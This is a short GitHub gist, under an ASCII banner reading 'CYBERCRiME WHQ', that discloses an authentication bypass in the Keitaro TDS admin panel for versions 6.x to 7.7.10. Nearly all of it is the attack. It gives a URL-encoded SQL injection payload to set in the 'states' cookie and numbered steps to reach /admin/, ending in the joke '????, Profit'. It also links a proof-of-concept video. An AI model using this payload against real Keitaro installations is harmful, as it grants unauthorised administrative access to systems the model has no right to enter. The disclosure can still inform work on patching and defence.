Skip to content

Instantly share code, notes, and snippets.

@Xyl2k
Created November 1, 2016 02:08
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save Xyl2k/c0a9cb662a7e6275dcf63b0336574edf to your computer and use it in GitHub Desktop.
Save Xyl2k/c0a9cb662a7e6275dcf63b0336574edf to your computer and use it in GitHub Desktop.
____/\_____/\____/\____/\____/\____/\____/\__/\____/\____/\
/ ___/ / / - _/ __ / __ / ___/ __ / / / ___/\
/ / /__ __/ - / _/_/ _/ / / _/ / / / / _/__\/
/_____/ /___//_____/_____/__/__/_____/__/__/___/_/_/_/_____/\nf!
\_____\/\___\\_____\_____\__\__\_____\__\__\___\_\_\_\_____\/
C Y B E R C R i M E W H Q
Keitaro TDS Auth bypass v6.x - v7.7.10
Discovered on.: 28/03/2014
Released on...: 31/10/2016
[1] go to /admin/
[2] Put in cookie: states=blah-blah%27%20OR%20%271%27%3D%271
[3] F5
[4] ????
[5] Profit.
PoC: https://www.youtube.com/watch?v=h8VmQDcN070
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment